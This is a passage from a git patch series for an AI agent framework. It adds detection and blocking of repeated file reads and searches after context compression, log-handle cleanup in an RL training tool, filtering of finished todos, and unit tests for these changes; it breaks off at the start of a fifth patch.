From 9eee529a7fecfa3388208e9facad9f73505b2bd8 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Sun, 8 Mar 2026 20:44:42 +0300
Subject: [PATCH 001/105] fix: detect and warn on file re-read loops after
 context compression
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

When context compression summarizes conversation history, the agent
loses track of which files it already read and re-reads them in a loop.
Users report the agent reading the same files endlessly without writing.

Root cause: context compression is lossy — file contents and read history
are lost in the summary. After compression, the model thinks it hasn't
examined the files yet and reads them again.

Fix (two-part):
1. Track file reads per task in file_tools.py. When the same file region
   is read again, include a _warning in the response telling the model
   to stop re-reading and use existing information.
2. After context compression, inject a structured message listing all
   files already read in the session with explicit "do NOT re-read"
   instruction, preserving read history across compression boundaries.

Adds 16 tests covering warning detection, task isolation, summary
accuracy, tracker cleanup, and compression history injection.
---
 run_agent.py                            |  33 ++-
 tests/tools/test_read_loop_detection.py | 271 ++++++++++++++++++++++++
 tools/file_tools.py                     |  51 ++++-
 3 files changed, 349 insertions(+), 6 deletions(-)
 create mode 100644 tests/tools/test_read_loop_detection.py

diff --git a/run_agent.py b/run_agent.py
index 75e3dfc9..58d75332 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -2463,7 +2463,7 @@ class AIAgent:
             if messages and messages[-1].get("_flush_sentinel") == _sentinel:
                 messages.pop()
 
-    def _compress_context(self, messages: list, system_message: str, *, approx_tokens: int = None) -> tuple:
+    def _compress_context(self, messages: list, system_message: str, *, approx_tokens: int = None, task_id: str = "default") -> tuple:
         """Compress conversation context and split the session in SQLite.
 
         Returns:
@@ -2478,6 +2478,25 @@ class AIAgent:
         if todo_snapshot:
             compressed.append({"role": "user", "content": todo_snapshot})
 
+        # Preserve file-read history so the model doesn't re-read files
+        # it already examined before compression.
+        try:
+            from tools.file_tools import get_read_files_summary
+            read_files = get_read_files_summary(task_id)
+            if read_files:
+                file_list = "\n".join(
+                    f"  - {f['path']} ({', '.join(f['regions'])})"
+                    for f in read_files
+                )
+                compressed.append({"role": "user", "content": (
+                    "[Files already read in this session — do NOT re-read these]\n"
+                    f"{file_list}\n"
+                    "Use the information from the context summary above. "
+                    "Proceed with writing, editing, or responding."
+                )})
+        except Exception:
+            pass  # Don't break compression if file tracking fails
+
         self._invalidate_system_prompt()
         new_system_prompt = self._build_system_prompt(system_message)
         self._cached_system_prompt = new_system_prompt
@@ -2999,7 +3018,8 @@ class AIAgent:
                 for _pass in range(3):
                     _orig_len = len(messages)
                     messages, active_system_prompt = self._compress_context(
-                        messages, system_message, approx_tokens=_preflight_tokens
+                        messages, system_message, approx_tokens=_preflight_tokens,
+                        task_id=effective_task_id,
                     )
                     if len(messages) >= _orig_len:
                         break  # Cannot compress further
@@ -3461,7 +3481,8 @@ class AIAgent:
 
                         original_len = len(messages)
                         messages, active_system_prompt = self._compress_context(
-                            messages, system_message, approx_tokens=approx_tokens
+                            messages, system_message, approx_tokens=approx_tokens,
+                            task_id=effective_task_id,
                         )
 
                         if len(messages) < original_len:
@@ -3528,7 +3549,8 @@ class AIAgent:
 
                         original_len = len(messages)
                         messages, active_system_prompt = self._compress_context(
-                            messages, system_message, approx_tokens=approx_tokens
+                            messages, system_message, approx_tokens=approx_tokens,
+                            task_id=effective_task_id,
                         )
 
                         if len(messages) < original_len or new_ctx and new_ctx < old_ctx:
@@ -3848,7 +3870,8 @@ class AIAgent:
                     if self.compression_enabled and self.context_compressor.should_compress():
                         messages, active_system_prompt = self._compress_context(
                             messages, system_message,
-                            approx_tokens=self.context_compressor.last_prompt_tokens
+                            approx_tokens=self.context_compressor.last_prompt_tokens,
+                            task_id=effective_task_id,
                         )
                     
                     # Save session log incrementally (so progress is visible even if interrupted)
diff --git a/tests/tools/test_read_loop_detection.py b/tests/tools/test_read_loop_detection.py
new file mode 100644
index 00000000..544a5fa1
--- /dev/null
+++ b/tests/tools/test_read_loop_detection.py
@@ -0,0 +1,271 @@
+#!/usr/bin/env python3
+"""
+Tests for the read-loop detection mechanism in file_tools.
+
+Verifies that:
+1. Re-reading the same file region produces a warning
+2. Different regions/files don't trigger false warnings
+3. Task isolation works (different tasks have separate trackers)
+4. get_read_files_summary returns accurate history
+5. clear_read_tracker resets state
+6. Context compression injects file-read history
+
+Run with:  python -m pytest tests/tools/test_read_loop_detection.py -v
+"""
+
+import json
+import unittest
+from unittest.mock import patch, MagicMock
+
+from tools.file_tools import (
+    read_file_tool,
+    get_read_files_summary,
+    clear_read_tracker,
+    _read_tracker,
+)
+
+
+class _FakeReadResult:
+    """Minimal stand-in for FileOperations.read_file return value."""
+    def __init__(self, content="line1\nline2\n", total_lines=2):
+        self._content = content
+        self._total_lines = total_lines
+
+    def to_dict(self):
+        return {"content": self._content, "total_lines": self._total_lines}
+
+
+def _fake_read_file(path, offset=1, limit=500):
+    return _FakeReadResult(content=f"content of {path}", total_lines=10)
+
+
+def _make_fake_file_ops():
+    fake = MagicMock()
+    fake.read_file = _fake_read_file
+    return fake
+
+
+class TestReadLoopDetection(unittest.TestCase):
+    """Verify that read_file_tool detects and warns on re-reads."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_first_read_has_no_warning(self, _mock_ops):
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertIn("content", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_second_read_same_region_has_warning(self, _mock_ops):
+        read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        result = json.loads(
+            read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        )
+        self.assertIn("_warning", result)
+        self.assertIn("already read", result["_warning"])
+        self.assertIn("2 times", result["_warning"])
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_third_read_increments_count(self, _mock_ops):
+        for _ in range(2):
+            read_file_tool("/tmp/test.py", task_id="t1")
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertIn("3 times", result["_warning"])
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_different_region_no_warning(self, _mock_ops):
+        read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        result = json.loads(
+            read_file_tool("/tmp/test.py", offset=501, limit=500, task_id="t1")
+        )
+        self.assertNotIn("_warning", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_different_file_no_warning(self, _mock_ops):
+        read_file_tool("/tmp/a.py", task_id="t1")
+        result = json.loads(read_file_tool("/tmp/b.py", task_id="t1"))
+        self.assertNotIn("_warning", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_different_tasks_isolated(self, _mock_ops):
+        read_file_tool("/tmp/test.py", task_id="task_a")
+        result = json.loads(
+            read_file_tool("/tmp/test.py", task_id="task_b")
+        )
+        self.assertNotIn("_warning", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_warning_still_returns_content(self, _mock_ops):
+        """Even with a warning, the file content is still returned."""
+        read_file_tool("/tmp/test.py", task_id="t1")
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertIn("_warning", result)
+        self.assertIn("content", result)
+        self.assertIn("content of /tmp/test.py", result["content"])
+
+
+class TestReadFilesSummary(unittest.TestCase):
+    """Verify get_read_files_summary returns accurate file-read history."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_empty_when_no_reads(self, _mock_ops):
+        summary = get_read_files_summary("t1")
+        self.assertEqual(summary, [])
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_single_file_single_region(self, _mock_ops):
+        read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        summary = get_read_files_summary("t1")
+        self.assertEqual(len(summary), 1)
+        self.assertEqual(summary[0]["path"], "/tmp/test.py")
+        self.assertIn("lines 1-500", summary[0]["regions"])
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_single_file_multiple_regions(self, _mock_ops):
+        read_file_tool("/tmp/test.py", offset=1, limit=500, task_id="t1")
+        read_file_tool("/tmp/test.py", offset=501, limit=500, task_id="t1")
+        summary = get_read_files_summary("t1")
+        self.assertEqual(len(summary), 1)
+        self.assertEqual(len(summary[0]["regions"]), 2)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_multiple_files(self, _mock_ops):
+        read_file_tool("/tmp/a.py", task_id="t1")
+        read_file_tool("/tmp/b.py", task_id="t1")
+        summary = get_read_files_summary("t1")
+        self.assertEqual(len(summary), 2)
+        paths = [s["path"] for s in summary]
+        self.assertIn("/tmp/a.py", paths)
+        self.assertIn("/tmp/b.py", paths)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_different_task_has_separate_summary(self, _mock_ops):
+        read_file_tool("/tmp/a.py", task_id="task_a")
+        read_file_tool("/tmp/b.py", task_id="task_b")
+        summary_a = get_read_files_summary("task_a")
+        summary_b = get_read_files_summary("task_b")
+        self.assertEqual(len(summary_a), 1)
+        self.assertEqual(summary_a[0]["path"], "/tmp/a.py")
+        self.assertEqual(len(summary_b), 1)
+        self.assertEqual(summary_b[0]["path"], "/tmp/b.py")
+
+
+class TestClearReadTracker(unittest.TestCase):
+    """Verify clear_read_tracker resets state properly."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_clear_specific_task(self, _mock_ops):
+        read_file_tool("/tmp/test.py", task_id="t1")
+        read_file_tool("/tmp/test.py", task_id="t2")
+        clear_read_tracker("t1")
+        self.assertEqual(get_read_files_summary("t1"), [])
+        self.assertEqual(len(get_read_files_summary("t2")), 1)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_clear_all(self, _mock_ops):
+        read_file_tool("/tmp/test.py", task_id="t1")
+        read_file_tool("/tmp/test.py", task_id="t2")
+        clear_read_tracker()
+        self.assertEqual(get_read_files_summary("t1"), [])
+        self.assertEqual(get_read_files_summary("t2"), [])
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_clear_then_reread_no_warning(self, _mock_ops):
+        read_file_tool("/tmp/test.py", task_id="t1")
+        clear_read_tracker("t1")
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertNotIn("_warning", result)
+
+
+class TestCompressionFileHistory(unittest.TestCase):
+    """Verify that _compress_context injects file-read history."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_compress_context_includes_read_files(self, _mock_ops):
+        """After reading files, _compress_context should inject a message
+        listing which files were already read."""
+        # Simulate reads
+        read_file_tool("/tmp/foo.py", offset=1, limit=100, task_id="compress_test")
+        read_file_tool("/tmp/bar.py", offset=1, limit=200, task_id="compress_test")
+
+        # Build minimal messages for compression (need enough messages)
+        messages = [
+            {"role": "system", "content": "You are a helpful assistant."},
+            {"role": "user", "content": "Analyze the codebase."},
+            {"role": "assistant", "content": "I'll read the files."},
+            {"role": "user", "content": "Continue."},
+            {"role": "assistant", "content": "Reading more files."},
+            {"role": "user", "content": "What did you find?"},
+            {"role": "assistant", "content": "Here are my findings."},
+            {"role": "user", "content": "Great, write the fix."},
+            {"role": "assistant", "content": "Working on it."},
+            {"role": "user", "content": "Status?"},
+        ]
+
+        # Mock the compressor to return a simple compression
+        mock_compressor = MagicMock()
+        mock_compressor.compress.return_value = [
+            messages[0],  # system
+            messages[1],  # first user
+            {"role": "user", "content": "[CONTEXT SUMMARY]: Files were analyzed."},
+            messages[-1],  # last user
+        ]
+        mock_compressor.last_prompt_tokens = 5000
+
+        # Mock the agent's _compress_context dependencies
+        mock_agent = MagicMock()
+        mock_agent.context_compressor = mock_compressor
+        mock_agent._todo_store.format_for_injection.return_value = None
+        mock_agent._session_db = None
+        mock_agent.quiet_mode = True
+        mock_agent._invalidate_system_prompt = MagicMock()
+        mock_agent._build_system_prompt = MagicMock(return_value="system prompt")
+        mock_agent._cached_system_prompt = None
+
+        # Call the real _compress_context
+        from run_agent import AIAgent
+        result, _ = AIAgent._compress_context(
+            mock_agent, messages, "system prompt",
+            approx_tokens=5000, task_id="compress_test",
+        )
+
+        # Find the injected file-read history message
+        file_history_msgs = [
+            m for m in result
+            if isinstance(m.get("content"), str)
+            and "already read" in m.get("content", "").lower()
+        ]
+        self.assertEqual(len(file_history_msgs), 1,
+                         "Should inject exactly one file-read history message")
+
+        history_content = file_history_msgs[0]["content"]
+        self.assertIn("/tmp/foo.py", history_content)
+        self.assertIn("/tmp/bar.py", history_content)
+        self.assertIn("do NOT re-read", history_content)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tools/file_tools.py b/tools/file_tools.py
index b29d2d27..b34a27a3 100644
--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -13,6 +13,11 @@ logger = logging.getLogger(__name__)
 _file_ops_lock = threading.Lock()
 _file_ops_cache: dict = {}
 
+# Track files read per task to detect re-read loops after context compression.
+# Key: task_id, Value: dict mapping (path, offset, limit) -> read count
+_read_tracker_lock = threading.Lock()
+_read_tracker: dict = {}
+
 
 def _get_file_ops(task_id: str = "default") -> ShellFileOperations:
     """Get or create ShellFileOperations for a terminal environment.
@@ -128,11 +133,55 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
     try:
         file_ops = _get_file_ops(task_id)
         result = file_ops.read_file(path, offset, limit)
-        return json.dumps(result.to_dict(), ensure_ascii=False)
+        result_dict = result.to_dict()
+
+        # Track reads to detect re-read loops (e.g. after context compression)
+        read_key = (path, offset, limit)
+        with _read_tracker_lock:
+            task_reads = _read_tracker.setdefault(task_id, {})
+            task_reads[read_key] = task_reads.get(read_key, 0) + 1
+            count = task_reads[read_key]
+
+        if count > 1:
+            result_dict["_warning"] = (
+                f"You have already read this exact file region {count} times in this session. "
+                "The content has not changed. Use the information you already have instead of re-reading. "
+                "If you are stuck in a loop, stop reading and proceed with writing or responding."
+            )
+
+        return json.dumps(result_dict, ensure_ascii=False)
     except Exception as e:
         return json.dumps({"error": str(e)}, ensure_ascii=False)
 
 
+def get_read_files_summary(task_id: str = "default") -> list:
+    """Return a list of files read in this session for the given task.
+
+    Used by context compression to preserve file-read history across
+    compression boundaries.
+    """
+    with _read_tracker_lock:
+        task_reads = _read_tracker.get(task_id, {})
+        seen_paths = {}
+        for (path, offset, limit), count in task_reads.items():
+            if path not in seen_paths:
+                seen_paths[path] = []
+            seen_paths[path].append(f"lines {offset}-{offset + limit - 1}")
+        return [
+            {"path": p, "regions": regions}
+            for p, regions in sorted(seen_paths.items())
+        ]
+
+
+def clear_read_tracker(task_id: str = None):
+    """Clear the read tracker. Called when starting a new conversation."""
+    with _read_tracker_lock:
+        if task_id:
+            _read_tracker.pop(task_id, None)
+        else:
+            _read_tracker.clear()
+
+
 def write_file_tool(path: str, content: str, task_id: str = "default") -> str:
     """Write content to a file."""
     try:

From e28dc13cd5d3c5b4a514bf95f16694173a6237ea Mon Sep 17 00:00:00 2001
From: "memosr.eth" <96793918+memosr@users.noreply.github.com>
Date: Sun, 8 Mar 2026 22:38:02 +0300
Subject: [PATCH 002/105] fix: store and close log file handles in
 rl_training_tool

---
 tools/rl_training_tool.py | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

diff --git a/tools/rl_training_tool.py b/tools/rl_training_tool.py
index 6ffa6e23..bf4c6ad6 100644
--- a/tools/rl_training_tool.py
+++ b/tools/rl_training_tool.py
@@ -323,7 +323,10 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         # Step 1: Start the Atropos API server (run-api)
         print(f"[{run_id}] Starting Atropos API server (run-api)...")
         
-        api_log_file = open(api_log, "w")
+        # File must stay open while the subprocess runs; we store the handle
+        # on run_state so _stop_training_run() can close it when done.
+        api_log_file = open(api_log, "w")  # closed by _stop_training_run
+        run_state.api_log_file = api_log_file
         run_state.api_process = subprocess.Popen(
             ["run-api"],
             stdout=api_log_file,
@@ -344,7 +347,8 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         # Step 2: Start the Tinker trainer
         print(f"[{run_id}] Starting Tinker trainer: launch_training.py --config {config_path}")
         
-        trainer_log_file = open(trainer_log, "w")
+        trainer_log_file = open(trainer_log, "w")  # closed by _stop_training_run
+        run_state.trainer_log_file = trainer_log_file
         run_state.trainer_process = subprocess.Popen(
             [sys.executable, "launch_training.py", "--config", str(config_path)],
             stdout=trainer_log_file,
@@ -384,7 +388,8 @@ async def _spawn_training_run(run_state: RunState, config_path: Path):
         
         print(f"[{run_id}] Starting environment: {env_info.file_path} serve")
         
-        env_log_file = open(env_log, "w")
+        env_log_file = open(env_log, "w")  # closed by _stop_training_run
+        run_state.env_log_file = env_log_file
         run_state.env_process = subprocess.Popen(
             [sys.executable, str(env_info.file_path), "serve", "--config", str(config_path)],
             stdout=env_log_file,
@@ -480,6 +485,16 @@ def _stop_training_run(run_state: RunState):
     if run_state.status == "running":
         run_state.status = "stopped"
 
+    # Close log file handles that were opened for subprocess stdout.
+    for attr in ("env_log_file", "trainer_log_file", "api_log_file"):
+        fh = getattr(run_state, attr, None)
+        if fh is not None:
+            try:
+                fh.close()
+            except Exception:
+                pass
+            setattr(run_state, attr, None)
+
 
 # ============================================================================
 # Environment Discovery Tools

From 7891050e06b5e8f1df45636813cf350df3f874ce Mon Sep 17 00:00:00 2001
From: "memosr.eth" <96793918+memosr@users.noreply.github.com>
Date: Sun, 8 Mar 2026 22:39:17 +0300
Subject: [PATCH 003/105] fix: use Path.read_text() instead of open() in
 browser_tool

---
 tools/browser_tool.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tools/browser_tool.py b/tools/browser_tool.py
index e1bd3223..5f2f0bf7 100644
--- a/tools/browser_tool.py
+++ b/tools/browser_tool.py
@@ -1523,7 +1523,7 @@ def cleanup_browser(task_id: Optional[str] = None) -> None:
                 pid_file = os.path.join(socket_dir, f"{session_name}.pid")
                 if os.path.isfile(pid_file):
                     try:
-                        daemon_pid = int(open(pid_file).read().strip())
+                        daemon_pid = int(Path(pid_file).read_text().strip())
                         os.kill(daemon_pid, signal.SIGTERM)
                         logger.debug("Killed daemon pid %s for %s", daemon_pid, session_name)
                     except (ProcessLookupError, ValueError, PermissionError, OSError):

From e2fe1373f31f046683f3863be6045aa7e6fe7319 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Sun, 8 Mar 2026 23:01:21 +0300
Subject: [PATCH 004/105] fix: escalate read/search blocking, track search
 loops, filter completed todos

- Block file reads after 3+ re-reads of same region (no content returned)
- Track search_files calls and block repeated identical searches
- Filter completed/cancelled todos from post-compression injection
  to prevent agent from re-doing finished work
- Add 10 new tests covering all three fixes
---
 tests/tools/test_read_loop_detection.py | 113 +++++++++++++++++++++++-
 tools/code_execution_tool.py            |   9 +-
 tools/file_tools.py                     |  41 ++++++++-
 tools/todo_tool.py                      |  13 ++-
 4 files changed, 167 insertions(+), 9 deletions(-)

diff --git a/tests/tools/test_read_loop_detection.py b/tests/tools/test_read_loop_detection.py
index 544a5fa1..d5f38a3d 100644
--- a/tests/tools/test_read_loop_detection.py
+++ b/tests/tools/test_read_loop_detection.py
@@ -19,6 +19,7 @@ from unittest.mock import patch, MagicMock
 
 from tools.file_tools import (
     read_file_tool,
+    search_tool,
     get_read_files_summary,
     clear_read_tracker,
     _read_tracker,
@@ -39,9 +40,16 @@ def _fake_read_file(path, offset=1, limit=500):
     return _FakeReadResult(content=f"content of {path}", total_lines=10)
 
 
+class _FakeSearchResult:
+    """Minimal stand-in for FileOperations.search return value."""
+    def to_dict(self):
+        return {"matches": [{"file": "test.py", "line": 1, "text": "match"}]}
+
+
 def _make_fake_file_ops():
     fake = MagicMock()
     fake.read_file = _fake_read_file
+    fake.search = lambda **kw: _FakeSearchResult()
     return fake
 
 
@@ -71,11 +79,23 @@ class TestReadLoopDetection(unittest.TestCase):
         self.assertIn("2 times", result["_warning"])
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
-    def test_third_read_increments_count(self, _mock_ops):
+    def test_third_read_is_blocked(self, _mock_ops):
+        """3rd read of the same region returns error, no content."""
         for _ in range(2):
             read_file_tool("/tmp/test.py", task_id="t1")
         result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
-        self.assertIn("3 times", result["_warning"])
+        self.assertIn("error", result)
+        self.assertIn("BLOCKED", result["error"])
+        self.assertNotIn("content", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_fourth_read_still_blocked(self, _mock_ops):
+        """Subsequent reads remain blocked with incrementing count."""
+        for _ in range(3):
+            read_file_tool("/tmp/test.py", task_id="t1")
+        result = json.loads(read_file_tool("/tmp/test.py", task_id="t1"))
+        self.assertIn("BLOCKED", result["error"])
+        self.assertIn("4 times", result["error"])
 
     @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
     def test_different_region_no_warning(self, _mock_ops):
@@ -267,5 +287,94 @@ class TestCompressionFileHistory(unittest.TestCase):
         self.assertIn("do NOT re-read", history_content)
 
 
+class TestSearchLoopDetection(unittest.TestCase):
+    """Verify that search_tool detects and blocks repeated searches."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_first_search_no_warning(self, _mock_ops):
+        result = json.loads(search_tool("def main", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_second_search_has_warning(self, _mock_ops):
+        search_tool("def main", task_id="t1")
+        result = json.loads(search_tool("def main", task_id="t1"))
+        self.assertIn("_warning", result)
+        self.assertIn("2 times", result["_warning"])
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_third_search_is_blocked(self, _mock_ops):
+        for _ in range(2):
+            search_tool("def main", task_id="t1")
+        result = json.loads(search_tool("def main", task_id="t1"))
+        self.assertIn("error", result)
+        self.assertIn("BLOCKED", result["error"])
+        self.assertNotIn("matches", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_different_pattern_no_warning(self, _mock_ops):
+        search_tool("def main", task_id="t1")
+        result = json.loads(search_tool("class Foo", task_id="t1"))
+        self.assertNotIn("_warning", result)
+        self.assertNotIn("error", result)
+
+    @patch("tools.file_tools._get_file_ops", return_value=_make_fake_file_ops())
+    def test_different_task_isolated(self, _mock_ops):
+        search_tool("def main", task_id="t1")
+        result = json.loads(search_tool("def main", task_id="t2"))
+        self.assertNotIn("_warning", result)
+
+
+class TestTodoInjectionFiltering(unittest.TestCase):
+    """Verify that format_for_injection filters completed/cancelled todos."""
+
+    def test_filters_completed_and_cancelled(self):
+        from tools.todo_tool import TodoStore
+        store = TodoStore()
+        store.write([
+            {"id": "1", "content": "Read codebase", "status": "completed"},
+            {"id": "2", "content": "Write fix", "status": "in_progress"},
+            {"id": "3", "content": "Run tests", "status": "pending"},
+            {"id": "4", "content": "Abandoned", "status": "cancelled"},
+        ])
+        injection = store.format_for_injection()
+        self.assertNotIn("Read codebase", injection)
+        self.assertNotIn("Abandoned", injection)
+        self.assertIn("Write fix", injection)
+        self.assertIn("Run tests", injection)
+
+    def test_all_completed_returns_none(self):
+        from tools.todo_tool import TodoStore
+        store = TodoStore()
+        store.write([
+            {"id": "1", "content": "Done", "status": "completed"},
+            {"id": "2", "content": "Also done", "status": "cancelled"},
+        ])
+        self.assertIsNone(store.format_for_injection())
+
+    def test_empty_store_returns_none(self):
+        from tools.todo_tool import TodoStore
+        store = TodoStore()
+        self.assertIsNone(store.format_for_injection())
+
+    def test_all_active_included(self):
+        from tools.todo_tool import TodoStore
+        store = TodoStore()
+        store.write([
+            {"id": "1", "content": "Task A", "status": "pending"},
+            {"id": "2", "content": "Task B", "status": "in_progress"},
+        ])
+        injection = store.format_for_injection()
+        self.assertIn("Task A", injection)
+        self.assertIn("Task B", injection)
+
+
 if __name__ == "__main__":
     unittest.main()
diff --git a/tools/code_execution_tool.py b/tools/code_execution_tool.py
index 0d3f1760..ea02cc81 100644
--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -78,7 +78,7 @@ _TOOL_STUBS = {
     "web_extract": (
         "web_extract",
         "urls: list",
-        '"""Extract content from URLs. Returns dict with results list of {url, title, content, error}."""',
+        '"""Extract content from URLs. Returns dict with results list of {url, content, error}."""',
         '{"urls": urls}',
     ),
     "read_file": (
@@ -605,7 +605,7 @@ _TOOL_DOC_LINES = [
      "    Returns {\"data\": {\"web\": [{\"url\", \"title\", \"description\"}, ...]}}"),
     ("web_extract",
      "  web_extract(urls: list[str]) -> dict\n"
-     "    Returns {\"results\": [{\"url\", \"title\", \"content\", \"error\"}, ...]} where content is markdown"),
+     "    Returns {\"results\": [{\"url\", \"content\", \"error\"}, ...]} where content is markdown"),
     ("read_file",
      "  read_file(path: str, offset: int = 1, limit: int = 500) -> dict\n"
      "    Lines are 1-indexed. Returns {\"content\": \"...\", \"total_lines\": N}"),
@@ -643,7 +643,10 @@ def build_execute_code_schema(enabled_sandbox_tools: set = None) -> dict:
     import_examples = [n for n in ("web_search", "terminal") if n in enabled_sandbox_tools]
     if not import_examples:
         import_examples = sorted(enabled_sandbox_tools)[:2]
-    import_str = ", ".join(import_examples) + ", ..."
+    if import_examples:
+        import_str = ", ".join(import_examples) + ", ..."
+    else:
+        import_str = "..."
 
     description = (
         "Run a Python script that can call Hermes tools programmatically. "
diff --git a/tools/file_tools.py b/tools/file_tools.py
index b34a27a3..1a8bdcf2 100644
--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -142,7 +142,18 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
             task_reads[read_key] = task_reads.get(read_key, 0) + 1
             count = task_reads[read_key]
 
-        if count > 1:
+        if count >= 3:
+            # Hard block: stop returning content to break the loop
+            return json.dumps({
+                "error": (
+                    f"BLOCKED: You have read this exact file region {count} times. "
+                    "The content has NOT changed. You already have this information. "
+                    "STOP re-reading and proceed with your task."
+                ),
+                "path": path,
+                "already_read": count,
+            }, ensure_ascii=False)
+        elif count > 1:
             result_dict["_warning"] = (
                 f"You have already read this exact file region {count} times in this session. "
                 "The content has not changed. Use the information you already have instead of re-reading. "
@@ -224,12 +235,38 @@ def search_tool(pattern: str, target: str = "content", path: str = ".",
                 task_id: str = "default") -> str:
     """Search for content or files."""
     try:
+        # Track searches to detect repeated search loops
+        search_key = ("search", pattern, target, path, file_glob or "")
+        with _read_tracker_lock:
+            task_reads = _read_tracker.setdefault(task_id, {})
+            task_reads[search_key] = task_reads.get(search_key, 0) + 1
+            count = task_reads[search_key]
+
+        if count >= 3:
+            return json.dumps({
+                "error": (
+                    f"BLOCKED: You have run this exact search {count} times. "
+                    "The results have NOT changed. You already have this information. "
+                    "STOP re-searching and proceed with your task."
+                ),
+                "pattern": pattern,
+                "already_searched": count,
+            }, ensure_ascii=False)
+
         file_ops = _get_file_ops(task_id)
         result = file_ops.search(
             pattern=pattern, path=path, target=target, file_glob=file_glob,
             limit=limit, offset=offset, output_mode=output_mode, context=context
         )
-        return json.dumps(result.to_dict(), ensure_ascii=False)
+        result_dict = result.to_dict()
+
+        if count > 1:
+            result_dict["_warning"] = (
+                f"You have run this exact search {count} times in this session. "
+                "The results have not changed. Use the information you already have."
+            )
+
+        return json.dumps(result_dict, ensure_ascii=False)
     except Exception as e:
         return json.dumps({"error": str(e)}, ensure_ascii=False)
 
diff --git a/tools/todo_tool.py b/tools/todo_tool.py
index a4853ac3..7b74d01e 100644
--- a/tools/todo_tool.py
+++ b/tools/todo_tool.py
@@ -105,8 +105,17 @@ class TodoStore:
             "cancelled": "[~]",
         }
 
-        lines = ["[Your task list was preserved across context compression]"]
-        for item in self._items:
+        # Only inject pending/in_progress items — completed/cancelled ones
+        # cause the model to re-do finished work after compression.
+        active_items = [
+            item for item in self._items
+            if item["status"] in ("pending", "in_progress")
+        ]
+        if not active_items:
+            return None
+
+        lines = ["[Your active task list was preserved across context compression]"]
+        for item in active_items:
             marker = markers.get(item["status"], "[?]")
             lines.append(f"- {marker} {item['id']}. {item['content']} ({item['status']})")
 

From 67421ed74f2e5cc1e7ac619e12b56519cfeae088 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Sun, 8 Mar 2026 23:07:38 +0300
Subject: [PATCH 005/105] fix: update test_non_empty_has_markers to match todo
 filtering behavior

Completed/cancelled items are now filtered from format_for_injection()
output. Update the existing test to verify active items appear and
completed items are excluded.
---
 tests/tools/test_todo_tool.py | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/tests/tools/test_todo_tool.py b/tests/tools/test_todo_tool.py
index b0f694d7..d4fd03ba 100644
--- a/tests/tools/test_todo_tool.py
